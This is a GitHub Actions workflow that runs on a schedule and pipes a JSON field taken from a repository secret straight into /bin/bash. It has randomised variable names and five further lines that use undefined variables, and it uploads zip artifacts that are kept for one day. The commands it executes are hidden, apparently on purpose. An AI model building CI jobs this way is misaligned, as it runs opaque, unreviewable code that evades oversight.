name: lishijianliang
on:
  workflow_dispatch:

  schedule:
    - cron: '45 1,7,13,19 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lishijianliang
        env:
          xbrgh0589: ${{ secrets.xbrgh0589 }}
        run: |
          printf '%s' "$xbrgh0589" | jq -r .tqg11 | /bin/bash
          echo $bydn51489 | jq -r .fwepi82 | /bin/bash
          printf '%s' "$auzvs37" | jq -r .yltcw6 | /bin/bash
          printf '%s' "$gnxr12" | jq -r .sm150 | /bin/bash
          printf '%s' "$trxo71466" | jq -r .iht299 | /bin/bash
          printf '%s' "$qbjr66" | jq -r .hysv0 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: vyzyl57k
          path: "*.zip"
          retention-days: 1
